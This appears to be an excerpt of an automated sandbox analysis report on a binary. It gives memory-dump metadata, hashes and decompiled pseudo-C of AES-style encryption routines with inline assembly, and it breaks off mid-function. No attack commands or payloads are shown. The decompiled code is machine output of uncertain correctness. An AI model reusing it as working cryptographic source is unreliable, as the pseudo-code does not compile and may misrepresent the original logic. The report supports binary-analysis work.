                                                              0x00ba2df0
                                                              0x00ba2df3
                                                              0x00ba2df6
                                                              0x00ba2dfa
                                                              0x00ba2e04
                                                              0x00ba2e06
                                                              0x00ba2e09
                                                              0x00ba2e0e
                                                              0x00ba2e10
                                                              0x00ba2e11
                                                              0x00ba2e13
                                                              0x00ba2e16
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2e00
                                                              0x00ba2e00
                                                              0x00ba2e04
                                                              0x00000000
                                                              0x00ba2c23
                                                              0x00ba2c23
                                                              0x00ba2c29
                                                              0x00ba2c30
                                                              0x00ba2c34
                                                              0x00ba2c3a
                                                              0x00ba2c40
                                                              0x00ba2c44
                                                              0x00ba2c49
                                                              0x00ba2c4a
                                                              0x00ba2c4d
                                                              0x00ba2c51
                                                              0x00ba2c55
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2c55
                                                              0x00ba2c30
                                                              0x00ba2c57
                                                              0x00ba2c5a
                                                              0x00ba2c5c
                                                              0x00ba2c60
                                                              0x00ba2c68
                                                              0x00ba2c6e
                                                              0x00ba2c73
                                                              0x00ba2c77
                                                              0x00ba2c7c
                                                              0x00ba2c80
                                                              0x00ba2c84
                                                              0x00ba2c88
                                                              0x00ba2c8f
                                                              0x00ba2c93
                                                              0x00ba2c99
                                                              0x00ba2ca5
                                                              0x00ba2ca8
                                                              0x00ba2cb0
                                                              0x00ba2cb7
                                                              0x00ba2cbb
                                                              0x00ba2cbe
                                                              0x00ba2cc1
                                                              0x00ba2cc1
                                                              0x00ba2cb0
                                                              0x00ba2cc6
                                                              0x00ba2ccb
                                                              0x00ba2cce
                                                              0x00ba2cd1
                                                              0x00ba2cd3
                                                              0x00ba2cd3
                                                              0x00ba2cd3
                                                              0x00ba2c88
                                                              0x00ba2cdc
                                                              0x00ba2e18
                                                              0x00ba2e18
                                                              0x00ba2e1d
                                                              0x00ba2e23
                                                              0x00ba2ce2
                                                              0x00ba2ce9
                                                              0x00ba2cf5
                                                              0x00ba2cf8
                                                              0x00ba2cfb
                                                              0x00ba2cfd
                                                              0x00ba2cff
                                                              0x00ba2d01
                                                              0x00ba2d05
                                                              0x00ba2d09
                                                              0x00ba2d0a
                                                              0x00ba2d0d
                                                              0x00ba2d0e
                                                              0x00ba2d12
                                                              0x00ba2d17
                                                              0x00ba2d1d
                                                              0x00ba2d1d
                                                              0x00ba2cdc

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6ca65db41aeb67edb8e654b06e533f59a24df482418cc9813ac49f26b87c0ac
                                                              • Instruction ID: 7d5e0c07653c48bfd9e02fa4f07af3125cb6cb90d153bc401ae0e140b2690078
                                                              • Opcode Fuzzy Hash: b6ca65db41aeb67edb8e654b06e533f59a24df482418cc9813ac49f26b87c0ac
                                                              • Instruction Fuzzy Hash: EB7136715083868FD714DF28848496BBBE4EFDA318F050AADE9C687356D770E905CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9BFD0, Relevance: .2, Instructions: 206COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00B9BFD0(void* __ebx, void* __edi) {
				signed int _t121;
				signed char _t125;
				signed char _t147;
				void* _t150;
				signed int* _t151;
				void* _t153;
				intOrPtr _t156;
				signed char* _t157;
				unsigned int _t159;
				signed int _t167;
				signed int _t170;
				intOrPtr* _t172;
				unsigned int _t173;
				signed char* _t175;
				signed int _t180;
				void* _t188;
				signed char* _t189;
				unsigned int _t192;
				unsigned int _t193;
				intOrPtr _t195;
				void* _t198;

				_t188 = __edi;
				_t150 = __ebx;
				E00C6BB10(0x14);
				_t193 =  *(_t198 + 0x1c);
				_t172 =  *((intOrPtr*)(_t193 + 0x160));
				 *((intOrPtr*)(_t198 + 8)) =  *((intOrPtr*)(_t193 + 0x170));
				 *((intOrPtr*)(_t198 + 4)) =  *((intOrPtr*)(_t193 + 0x174));
				 *((intOrPtr*)(_t198 + 0x14)) =  *((intOrPtr*)(_t193 + 0x164));
				_t156 =  *(_t198 + 0x28) +  *((intOrPtr*)(_t193 + 0x38));
				 *((intOrPtr*)(_t198 + 0x10)) = _t172;
				asm("adc eax, [esi+0x3c]");
				if(0 > 0xf || 0 >= 0xf && _t156 > 0xffffffe0) {
					return 0xffffffff;
				} else {
					 *((intOrPtr*)(_t193 + 0x38)) = _t156;
					 *((intOrPtr*)(_t193 + 0x3c)) = 0;
					if( *((intOrPtr*)(_t193 + 0x16c)) != 0) {
						 *_t172(_t193 + 0x40, _t193 + 0x60);
						_t198 = _t198 + 8;
						 *((intOrPtr*)(_t193 + 0x16c)) = 0;
					}
					_t157 =  *(_t193 + 0x168);
					_push(_t150);
					_t151 =  *(_t198 + 0x24);
					_t195 =  *((intOrPtr*)(_t193 + 0xc));
					_push(_t188);
					_t189 =  *(_t198 + 0x30);
					asm("bswap ebp");
					 *(_t198 + 0x28) = _t157;
					if(_t157 == 0) {
						L13:
						_t173 =  *(_t198 + 0x34);
						if(_t173 >= 0xc00) {
							 *(_t198 + 0x1c) = 0xaaaaaaab * _t173 >> 0x20 >> 0xb;
							do {
								 *(_t198 + 0x18) = 0xc0;
								do {
									 *((intOrPtr*)(_t198 + 0x20))(_t193, _t193 + 0x10,  *((intOrPtr*)(_t198 + 0x10)));
									_t195 = _t195 + 1;
									asm("bswap ecx");
									 *((intOrPtr*)(_t193 + 0xc)) = _t195;
									_t198 = _t198 + 0xc;
									 *_t189 =  *(_t193 + 0x10) ^  *_t151;
									_t189 =  &(_t189[0x10]);
									 *(_t189 - 0xc) = _t151[1] ^  *(_t193 + 0x14);
									_t167 = _t151[2] ^  *(_t193 + 0x18);
									_t151 =  &(_t151[4]);
									 *(_t189 - 8) = _t167;
									_t58 = _t198 + 0x18;
									 *_t58 =  *(_t198 + 0x18) - 1;
									 *(_t189 - 4) =  *(_t151 - 4) ^  *(_t193 + 0x1c);
								} while ( *_t58 != 0);
								 *(_t198 + 0x30)(_t193 + 0x40, _t193 + 0x60, _t189 - 0xc00, 0xc00);
								 *(_t198 + 0x44) =  *(_t198 + 0x44) - 0xc00;
								_t198 = _t198 + 0x10;
								_t67 = _t198 + 0x1c;
								 *_t67 =  *(_t198 + 0x1c) - 1;
							} while ( *_t67 != 0);
							_t157 =  *(_t198 + 0x28);
							_t173 =  *(_t198 + 0x34);
						}
						_t121 = _t173 & 0xfffffff0;
						 *(_t198 + 0x18) = _t121;
						if(_t121 != 0) {
							if(_t173 >= 0x10) {
								 *(_t198 + 0x1c) = _t173 >> 4;
								do {
									 *((intOrPtr*)(_t198 + 0x20))(_t193, _t193 + 0x10,  *((intOrPtr*)(_t198 + 0x10)));
									_t195 = _t195 + 1;
									 *((intOrPtr*)(_t198 + 0x40)) =  *((intOrPtr*)(_t198 + 0x40)) - 0x10;
									asm("bswap edx");
									 *((intOrPtr*)(_t193 + 0xc)) = _t195;
									_t198 = _t198 + 0xc;
									 *_t189 =  *(_t193 + 0x10) ^  *_t151;
									_t189 =  &(_t189[0x10]);
									 *(_t189 - 0xc) = _t151[1] ^  *(_t193 + 0x14);
									_t180 = _t151[2] ^  *(_t193 + 0x18);
									_t151 =  &(_t151[4]);
									 *(_t189 - 8) = _t180;
									_t88 = _t198 + 0x1c;
									 *_t88 =  *(_t198 + 0x1c) - 1;
									 *(_t189 - 4) =  *(_t151 - 4) ^  *(_t193 + 0x1c);
								} while ( *_t88 != 0);
								_t121 =  *(_t198 + 0x18);
							}
							 *(_t198 + 0x30)(_t193 + 0x40, _t193 + 0x60, _t189 - _t121, _t121);
							_t157 =  *(_t198 + 0x38);
							_t173 =  *(_t198 + 0x44);
							_t198 = _t198 + 0x10;
						}
						if(_t173 != 0) {
							 *((intOrPtr*)(_t198 + 0x20))(_t193, _t193 + 0x10,  *((intOrPtr*)(_t198 + 0x10)));
							_t159 =  *(_t198 + 0x34);
							asm("bswap ebp");
							_t198 = _t198 + 0xc;
							 *((intOrPtr*)(_t193 + 0xc)) = _t195 + 1;
							_t175 =  &(_t189[_t159]);
							_t153 = _t151 - _t189;
							do {
								_t125 =  *(_t193 + _t159 + 0x10) ^  *(_t153 + _t175);
								 *_t175 = _t125;
								 *(_t193 + _t159 + 0x40) =  *(_t193 + _t159 + 0x40) ^ _t125;
								_t192 =  *(_t198 + 0x34) - 1;
								_t159 = _t159 + 1;
								_t175 =  &(_t175[1]);
								 *(_t198 + 0x34) = _t192;
							} while (_t192 != 0);
							 *(_t198 + 0x28) = _t159;
						}
					} else {
						while( *(_t198 + 0x34) != 0) {
							_t147 = _t157[_t193 + 0x10] ^  *_t151;
							 *(_t198 + 0x34) =  *(_t198 + 0x34) - 1;
							 *_t189 = _t147;
							_t157[_t193 + 0x40] = _t157[_t193 + 0x40] ^ _t147;
							_t189 =  &(_t189[1]);
							_t151 =  &(_t151[0]);
							_t170 =  &(_t157[1]) & 0x0000000f;
							 *(_t198 + 0x28) = _t170;
							if(_t170 != 0) {
								_t157 =  *(_t198 + 0x28);
								continue;
							} else {
								L12:
								 *(_t198 + 0x24)(_t193 + 0x40, _t193 + 0x60);
								_t157 =  *(_t198 + 0x30);
								_t198 = _t198 + 8;
								goto L13;
							}
							goto L29;
						}
						if(_t157 == 0) {
							goto L12;
						}
					}
					L29:
					 *(_t193 + 0x168) = _t157;
					return 0;
				}
			}
























                                                              0x00b9bfd0
                                                              0x00b9bfd0
                                                              0x00b9bfd5
                                                              0x00b9bfdb
                                                              0x00b9bfeb
                                                              0x00b9bff1
                                                              0x00b9bffb
                                                              0x00b9c003
                                                              0x00b9c009
                                                              0x00b9c00c
                                                              0x00b9c010
                                                              0x00b9c016
                                                              0x00b9c23a
                                                              0x00b9c027
                                                              0x00b9c02e
                                                              0x00b9c031
                                                              0x00b9c034
                                                              0x00b9c03e
                                                              0x00b9c040
                                                              0x00b9c043
                                                              0x00b9c043
                                                              0x00b9c04d
                                                              0x00b9c053
                                                              0x00b9c054
                                                              0x00b9c059
                                                              0x00b9c05c
                                                              0x00b9c05d
                                                              0x00b9c061
                                                              0x00b9c063
                                                              0x00b9c069
                                                              0x00b9c0b4
                                                              0x00b9c0b4
                                                              0x00b9c0be
                                                              0x00b9c0ce
                                                              0x00b9c0d2
                                                              0x00b9c0d2
                                                              0x00b9c0e0
                                                              0x00b9c0ea
                                                              0x00b9c0ee
                                                              0x00b9c0f1
                                                              0x00b9c0f3
                                                              0x00b9c0fb
                                                              0x00b9c0fe
                                                              0x00b9c106
                                                              0x00b9c109
                                                              0x00b9c10f
                                                              0x00b9c112
                                                              0x00b9c115
                                                              0x00b9c11e
                                                              0x00b9c11e
                                                              0x00b9c123
                                                              0x00b9c123
                                                              0x00b9c13c
                                                              0x00b9c140
                                                              0x00b9c148
                                                              0x00b9c14b
                                                              0x00b9c14b
                                                              0x00b9c14b
                                                              0x00b9c152
                                                              0x00b9c156
                                                              0x00b9c156
                                                              0x00b9c15c
                                                              0x00b9c15f
                                                              0x00b9c163
                                                              0x00b9c168
                                                              0x00b9c16d
                                                              0x00b9c171
                                                              0x00b9c17b
                                                              0x00b9c17f
                                                              0x00b9c180
                                                              0x00b9c187
                                                              0x00b9c189
                                                              0x00b9c191
                                                              0x00b9c194
                                                              0x00b9c19c
                                                              0x00b9c19f
                                                              0x00b9c1a5
                                                              0x00b9c1a8
                                                              0x00b9c1ab
                                                              0x00b9c1b4
                                                              0x00b9c1b4
                                                              0x00b9c1b9
                                                              0x00b9c1b9
                                                              0x00b9c1be
                                                              0x00b9c1be
                                                              0x00b9c1d0
                                                              0x00b9c1d4
                                                              0x00b9c1d8
                                                              0x00b9c1dc
                                                              0x00b9c1dc
                                                              0x00b9c1e1
                                                              0x00b9c1ed
                                                              0x00b9c1f1
                                                              0x00b9c1f6
                                                              0x00b9c1f8
                                                              0x00b9c1fb
                                                              0x00b9c1fe
                                                              0x00b9c201
                                                              0x00b9c203
                                                              0x00b9c207
                                                              0x00b9c20e
                                                              0x00b9c210
                                                              0x00b9c214
                                                              0x00b9c215
                                                              0x00b9c216
                                                              0x00b9c217
                                                              0x00b9c21b
                                                              0x00b9c21f
                                                              0x00b9c21f
                                                              0x00b9c06b
                                                              0x00b9c074
                                                              0x00b9c07f
                                                              0x00b9c081
                                                              0x00b9c085
                                                              0x00b9c087
                                                              0x00b9c08c
                                                              0x00b9c08d
                                                              0x00b9c08e
                                                              0x00b9c091
                                                              0x00b9c095
                                                              0x00b9c070
                                                              0x00000000
                                                              0x00b9c097
                                                              0x00b9c0a1
                                                              0x00b9c0a9
                                                              0x00b9c0ad
                                                              0x00b9c0b1
                                                              0x00000000
                                                              0x00b9c0b1
                                                              0x00000000
                                                              0x00b9c095
                                                              0x00b9c09b
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9c09b
                                                              0x00b9c223
                                                              0x00b9c226
                                                              0x00b9c232
                                                              0x00b9c232

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c4eef3606d849489a46c8cf01e13a301d6c5479e345453bf65955e78e7400ab
                                                              • Instruction ID: 6726f1fc7268f31252fa8fa6abfef276dad9ccfd674b9a1276e8b3f0f0a81337
                                                              • Opcode Fuzzy Hash: 2c4eef3606d849489a46c8cf01e13a301d6c5479e345453bf65955e78e7400ab
                                                              • Instruction Fuzzy Hash: 2B8136715087018FC728CF69C884AABBBF5FF89304F588A6DE49A8B641D731E905CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9C240, Relevance: .2, Instructions: 201COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 76%
                                                              			E00B9C240(void* __ebx, void* __edi) {
				signed int _t119;
				unsigned int _t122;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed char* _t150;
				intOrPtr _t156;
				signed int _t157;
				signed int _t159;
				signed char _t161;
				signed char _t170;
				intOrPtr* _t172;
				unsigned int _t175;
				signed int _t179;
				void* _t187;
				signed int* _t188;
				void* _t190;
				unsigned int _t191;
				intOrPtr _t193;
				signed char* _t196;
				void* _t197;
				void* _t200;

				_t187 = __edi;
				_t149 = __ebx;
				E00C6BB10(0x14);
				_t191 =  *(_t197 + 0x1c);
				_t172 =  *((intOrPtr*)(_t191 + 0x160));
				 *((intOrPtr*)(_t197 + 8)) =  *((intOrPtr*)(_t191 + 0x170));
				 *((intOrPtr*)(_t197 + 4)) =  *((intOrPtr*)(_t191 + 0x174));
				 *((intOrPtr*)(_t197 + 0x14)) =  *((intOrPtr*)(_t191 + 0x164));
				_t156 =  *(_t197 + 0x28) +  *((intOrPtr*)(_t191 + 0x38));
				 *((intOrPtr*)(_t197 + 0x10)) = _t172;
				asm("adc eax, [esi+0x3c]");
				if(0 > 0xf || 0 >= 0xf && _t156 > 0xffffffe0) {
					return 0xffffffff;
				} else {
					 *((intOrPtr*)(_t191 + 0x38)) = _t156;
					 *((intOrPtr*)(_t191 + 0x3c)) = 0;
					if( *((intOrPtr*)(_t191 + 0x16c)) != 0) {
						 *_t172(_t191 + 0x40, _t191 + 0x60);
						_t197 = _t197 + 8;
						 *((intOrPtr*)(_t191 + 0x16c)) = 0;
					}
					_t119 =  *(_t191 + 0x168);
					_push(_t149);
					_t150 =  *(_t197 + 0x28);
					_t193 =  *((intOrPtr*)(_t191 + 0xc));
					_push(_t187);
					_t188 =  *(_t197 + 0x2c);
					asm("bswap ebp");
					 *(_t197 + 0x28) = _t119;
					if(_t119 == 0) {
						L13:
						_t157 =  *(_t197 + 0x34);
						if(_t157 >= 0xc00) {
							 *(_t197 + 0x1c) = 0xaaaaaaab * _t157 >> 0x20 >> 0xb;
							do {
								 *(_t197 + 0x30)(_t191 + 0x40, _t191 + 0x60, _t188, 0xc00);
								_t200 = _t197 + 0x10;
								 *((intOrPtr*)(_t200 + 0x18)) = 0xc0;
								do {
									 *((intOrPtr*)(_t200 + 0x20))(_t191, _t191 + 0x10,  *((intOrPtr*)(_t200 + 0x10)));
									_t193 = _t193 + 1;
									asm("bswap eax");
									 *((intOrPtr*)(_t191 + 0xc)) = _t193;
									_t200 = _t200 + 0xc;
									 *_t150 =  *_t188 ^  *(_t191 + 0x10);
									_t150 =  &(_t150[0x10]);
									 *(_t150 - 0xc) = _t188[1] ^  *(_t191 + 0x14);
									_t142 = _t188[2] ^  *(_t191 + 0x18);
									_t188 =  &(_t188[4]);
									 *(_t150 - 8) = _t142;
									_t61 = _t200 + 0x18;
									 *_t61 =  *((intOrPtr*)(_t200 + 0x18)) - 1;
									 *(_t150 - 4) =  *(_t188 - 4) ^  *(_t191 + 0x1c);
								} while ( *_t61 != 0);
								 *((intOrPtr*)(_t200 + 0x34)) =  *((intOrPtr*)(_t200 + 0x34)) - 0xc00;
								_t66 = _t200 + 0x1c;
								 *_t66 =  *((intOrPtr*)(_t200 + 0x1c)) - 1;
							} while ( *_t66 != 0);
							_t119 =  *(_t200 + 0x28);
						}
						_t159 =  *(_t197 + 0x34) & 0xfffffff0;
						if(_t159 != 0) {
							 *(_t197 + 0x30)(_t191 + 0x40, _t191 + 0x60, _t188, _t159);
							_t197 = _t197 + 0x10;
							if( *(_t197 + 0x34) >= 0x10) {
								 *(_t197 + 0x20) =  *(_t197 + 0x34) >> 4;
								do {
									 *(_t197 + 0x20)(_t191, _t191 + 0x10,  *((intOrPtr*)(_t197 + 0x10)));
									_t193 = _t193 + 1;
									 *((intOrPtr*)(_t197 + 0x40)) =  *((intOrPtr*)(_t197 + 0x40)) - 0x10;
									asm("bswap edx");
									 *((intOrPtr*)(_t191 + 0xc)) = _t193;
									_t197 = _t197 + 0xc;
									 *_t150 =  *_t188 ^  *(_t191 + 0x10);
									_t150 =  &(_t150[0x10]);
									 *(_t150 - 0xc) = _t188[1] ^  *(_t191 + 0x14);
									_t179 = _t188[2] ^  *(_t191 + 0x18);
									_t188 =  &(_t188[4]);
									 *(_t150 - 8) = _t179;
									_t91 = _t197 + 0x20;
									 *_t91 =  *(_t197 + 0x20) - 1;
									 *(_t150 - 4) =  *(_t188 - 4) ^  *(_t191 + 0x1c);
								} while ( *_t91 != 0);
							}
							_t119 =  *(_t197 + 0x28);
						}
						if( *(_t197 + 0x34) != 0) {
							 *(_t197 + 0x20)(_t191, _t191 + 0x10,  *((intOrPtr*)(_t197 + 0x10)));
							_t122 =  *(_t197 + 0x34);
							asm("bswap ebp");
							_t197 = _t197 + 0xc;
							 *((intOrPtr*)(_t191 + 0xc)) = _t193 + 1;
							_t196 =  &(_t150[_t122]);
							_t190 = _t188 - _t150;
							do {
								_t161 =  *((intOrPtr*)(_t190 + _t196));
								 *(_t191 + _t122 + 0x40) =  *(_t191 + _t122 + 0x40) ^ _t161;
								_t175 =  *(_t197 + 0x34) - 1;
								 *_t196 =  *(_t191 + _t122 + 0x10) ^ _t161;
								_t122 = _t122 + 1;
								_t196 =  &(_t196[1]);
								 *(_t197 + 0x34) = _t175;
							} while (_t175 != 0);
							 *(_t197 + 0x28) = _t122;
						}
					} else {
						while( *(_t197 + 0x34) != 0) {
							_t170 =  *_t188;
							 *(_t197 + 0x34) =  *(_t197 + 0x34) - 1;
							 *_t150 =  *(_t191 + 0x10 + _t119) ^ _t170;
							 *(_t119 + _t191 + 0x40) =  *(_t119 + _t191 + 0x40) ^ _t170;
							_t188 =  &(_t188[0]);
							_t150 =  &(_t150[1]);
							_t146 = _t119 + 0x00000001 & 0x0000000f;
							 *(_t197 + 0x28) = _t146;
							if(_t146 != 0) {
								_t119 =  *(_t197 + 0x28);
								continue;
							} else {
								L12:
								 *((intOrPtr*)(_t197 + 0x24))(_t191 + 0x40, _t191 + 0x60);
								_t119 =  *(_t197 + 0x30);
								_t197 = _t197 + 8;
								goto L13;
							}
							goto L28;
						}
						if(_t119 == 0) {
							goto L12;
						}
					}
					L28:
					 *(_t191 + 0x168) = _t119;
					return 0;
				}
			}

























                                                              0x00b9c240
                                                              0x00b9c240
                                                              0x00b9c245
                                                              0x00b9c24b
                                                              0x00b9c25b
                                                              0x00b9c261
                                                              0x00b9c26b
                                                              0x00b9c273
                                                              0x00b9c279
                                                              0x00b9c27c
                                                              0x00b9c280
                                                              0x00b9c286
                                                              0x00b9c49a
                                                              0x00b9c297
                                                              0x00b9c29e
                                                              0x00b9c2a1
                                                              0x00b9c2a4
                                                              0x00b9c2ae
                                                              0x00b9c2b0
                                                              0x00b9c2b3
                                                              0x00b9c2b3
                                                              0x00b9c2bd
                                                              0x00b9c2c3
                                                              0x00b9c2c4
                                                              0x00b9c2c9
                                                              0x00b9c2cc
                                                              0x00b9c2cd
                                                              0x00b9c2d1
                                                              0x00b9c2d3
                                                              0x00b9c2d9
                                                              0x00b9c326
                                                              0x00b9c326
                                                              0x00b9c330
                                                              0x00b9c340
                                                              0x00b9c344
                                                              0x00b9c352
                                                              0x00b9c356
                                                              0x00b9c359
                                                              0x00b9c361
                                                              0x00b9c36b
                                                              0x00b9c36f
                                                              0x00b9c372
                                                              0x00b9c374
                                                              0x00b9c37c
                                                              0x00b9c37f
                                                              0x00b9c387
                                                              0x00b9c38a
                                                              0x00b9c390
                                                              0x00b9c393
                                                              0x00b9c396
                                                              0x00b9c39f
                                                              0x00b9c39f
                                                              0x00b9c3a4
                                                              0x00b9c3a4
                                                              0x00b9c3a9
                                                              0x00b9c3b1
                                                              0x00b9c3b1
                                                              0x00b9c3b1
                                                              0x00b9c3b8
                                                              0x00b9c3b8
                                                              0x00b9c3c0
                                                              0x00b9c3c3
                                                              0x00b9c3cf
                                                              0x00b9c3d3
                                                              0x00b9c3db
                                                              0x00b9c3e4
                                                              0x00b9c3e8
                                                              0x00b9c3f2
                                                              0x00b9c3f6
                                                              0x00b9c3f7
                                                              0x00b9c3fe
                                                              0x00b9c400
                                                              0x00b9c408
                                                              0x00b9c40b
                                                              0x00b9c413
                                                              0x00b9c416
                                                              0x00b9c41c
                                                              0x00b9c41f
                                                              0x00b9c422
                                                              0x00b9c42b
                                                              0x00b9c42b
                                                              0x00b9c430
                                                              0x00b9c430
                                                              0x00b9c3e8
                                                              0x00b9c435
                                                              0x00b9c435
                                                              0x00b9c43e
                                                              0x00b9c44a
                                                              0x00b9c44e
                                                              0x00b9c453
                                                              0x00b9c455
                                                              0x00b9c458
                                                              0x00b9c45b
                                                              0x00b9c45e
                                                              0x00b9c460
                                                              0x00b9c460
                                                              0x00b9c46b
                                                              0x00b9c471
                                                              0x00b9c472
                                                              0x00b9c475
                                                              0x00b9c476
                                                              0x00b9c477
                                                              0x00b9c47b
                                                              0x00b9c47f
                                                              0x00b9c47f
                                                              0x00b9c2db
                                                              0x00b9c2e4
                                                              0x00b9c2eb
                                                              0x00b9c2f1
                                                              0x00b9c2f7
                                                              0x00b9c2f9
                                                              0x00b9c2fe
                                                              0x00b9c2ff
                                                              0x00b9c300
                                                              0x00b9c303
                                                              0x00b9c307
                                                              0x00b9c2e0
                                                              0x00000000
                                                              0x00b9c309
                                                              0x00b9c313
                                                              0x00b9c31b
                                                              0x00b9c31f
                                                              0x00b9c323
                                                              0x00000000
                                                              0x00b9c323
                                                              0x00000000
                                                              0x00b9c307
                                                              0x00b9c30d
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9c30d
                                                              0x00b9c483
                                                              0x00b9c485
                                                              0x00b9c492
                                                              0x00b9c492

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a6d284aeba771d297abd19d85f1e2230c4e8247e5081d0bd3926f657acb5ba2
                                                              • Instruction ID: 1a604e8d9de88c691e6a2454047654ded9eda037ae8bee8ffd1684af583e39b4
                                                              • Opcode Fuzzy Hash: 3a6d284aeba771d297abd19d85f1e2230c4e8247e5081d0bd3926f657acb5ba2
                                                              • Instruction Fuzzy Hash: FA8115715087009FD724CF29C984AABBBF4FF89304F948A6DE49A87641D730E949CB56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B98CC0, Relevance: .2, Instructions: 200COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 30%
                                                              			E00B98CC0(intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _t20;
				signed int _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t25;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				void* _t45;
				void* _t46;

				_t35 = _a4;
				_t32 = _a8;
				_t29 = _a16;
				_t25 = _a20;
				_t20 = _a12 & 0xfffffff0;
				if(_t20 == 0) {
					L34:
					asm("pxor xmm0, xmm0");
					asm("pxor xmm1, xmm1");
					asm("pxor xmm2, xmm2");
					asm("pxor xmm3, xmm3");
					asm("pxor xmm4, xmm4");
					asm("pxor xmm5, xmm5");
					asm("pxor xmm6, xmm6");
					asm("pxor xmm7, xmm7");
					return _t20;
				}
				_t28 =  *(_t29 + 0xf0);
				if(_t25 == 0) {
					_t38 = _t29;
					_t26 = _t28;
					__eflags = _t20 - 0x60;
					if(_t20 < 0x60) {
						L23:
						asm("movups xmm2, [esi]");
						__eflags = _t20 - 0x20;
						if(__eflags < 0) {
							asm("movups xmm0, [edx]");
							asm("movups xmm1, [edx+0x10]");
							_t30 = _t29 + 0x20;
							asm("xorps xmm2, xmm0");
							do {
								asm("aesdec xmm2, xmm1");
								_t28 = _t28 - 1;
								__eflags = _t28;
								asm("movups xmm1, [edx]");
								_t18 = _t30 + 0x10; // 0xcccccccc
								_t30 = _t18;
							} while (_t28 != 0);
							asm("aesdeclast xmm2, xmm1");
							asm("movups [edi], xmm2");
							goto L34;
						}
						asm("movups xmm3, [esi+0x10]");
						if(__eflags == 0) {
							_t20 = E00B98880(_t20, _t28, _t29);
							asm("movups [edi], xmm2");
							asm("movups [edi+0x10], xmm3");
						} else {
							asm("movups xmm4, [esi+0x20]");
							__eflags = _t20 - 0x40;
							if(__eflags < 0) {
								_t20 = E00B98960(_t20, _t28, _t29);
								asm("movups [edi], xmm2");
								asm("movups [edi+0x10], xmm3");
								asm("movups [edi+0x20], xmm4");
							} else {
								asm("movups xmm5, [esi+0x30]");
								if(__eflags == 0) {
									_t20 = E00B98A70(_t20, _t28, _t29);
									asm("movups [edi], xmm2");
									asm("movups [edi+0x10], xmm3");
									asm("movups [edi+0x20], xmm4");
									asm("movups [edi+0x30], xmm5");
								} else {
